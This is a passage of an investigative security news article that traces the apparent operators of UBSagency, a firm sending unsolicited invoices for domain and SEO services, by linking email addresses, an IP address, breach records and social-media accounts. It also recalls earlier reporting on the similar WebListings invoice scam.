UBSagency’s LinkedIn page says the company has offices in Vegas, Half Moon Bay, Calif., and Renton, Wash. But once again, none of the addresses listed for these offices reveal any obvious clues about who runs UBSagency. And once again, none of these entities appear to exist as official businesses in their claimed state of residence.

Searching on ubsagency@gmail.com in Constella Intelligence shows the address was used sometime before February 2019 to create an account under the name “SammySam_Alon” at the interior decorating site Houzz.com. In January 2019, Houzz acknowledged that a data breach exposed account information on an undisclosed number of customers, including user IDs, one-way encrypted passwords, IP addresses, city and ZIP codes, as well as Facebook information.

SammySam_Alon registered at Houzz using an Internet address in Huntsville, Ala. (68.35.149.206). Constella says this address was associated with the email tropicglobal@gmail.com, which also is tied to several other “Sammy” accounts at different stores online.

Constella also says a highly unique password re-used by tropicglobal@gmail.com across numerous sites was used in connection with just a few other email accounts, including shenhavgroup@gmail.com, and distributorinvoice@mail.com.

The shenhavgroup@gmail.com address was used to register a Twitter account for a Sam Orit Alon in 2013, whose account says they are affiliated with the Shenhav Group. According to DomainTools, shenhavgroup@gmail.com was responsible for registering roughly two dozen domains, including the now-defunct unitedbusinessservice[.]com.

Constella further finds that the address distributorinvoice@mail.com was used to register an account at whmcs.com, a web hosting platform that suffered a breach of its user database several years back. The name on the WHMCS account was Shmuel Orit Alon, from Kidron, Israel.

UBSagency also has a Facebook page, or maybe “had” is the operative word because someone appears to have defaced it. Loading the Facebook page for UBSagency shows several of the images have been overlaid or replaced with a message from someone who is really disappointed with Sam Alon.

“Sam Alon is a LIAR, THIEF, COWARD AND HAS A VERY SMALL D*CK,” reads one of the messages:

The current Facebook profile page for UBSagency includes a logo that is similar to the DomainNetworks logo.

The logo in the UBSagency profile photo includes a graphic of what appears to be a magnifying glass with a line that zig-zags through bullet points inside and outside the circle, a unique pattern that is remarkably similar to the logo for DomainNetworks:

The logos for DomainNetworks (left) and UBSagency.

Constella also found that the same Huntsville IP address used by Sam Alon at Houzz was associated with yet another Houzz account, this one for someone named “Eliran.”

The UBSagency Facebook page features several messages from an Eliran “Dani” Benz, who is referred to by commenters as an employee or partner with UBSagency. The last check-in on Benz’s profile is from a beach at Rishon Le Siyon in Israel earlier this year.

Neither Mr. Alon nor Mr. Benz responded to multiple requests for comment.

It may be difficult to believe that anyone would pay an invoice for a domain name or SEO service they never ordered. However, there is plenty of evidence that these phony bills often get processed by administrative personnel at organizations that end up paying the requested amount because they assume it was owed for some services already provided.

In 2018, KrebsOnSecurity published How Internet Savvy are Your Leaders?, which examined public records to show that dozens of cities, towns, school districts and even political campaigns across the United States got snookered into paying these scam domain invoices from a similar scam company called WebListings Inc.

In 2020, KrebsOnSecurity featured a deep dive into who was likely behind the WebListings scam, which had been sending out these snail mail scam letters for over a decade. That investigation revealed the scam’s connection to a multi-level marketing operation run out of the U.K., and to two brothers living in Scotland.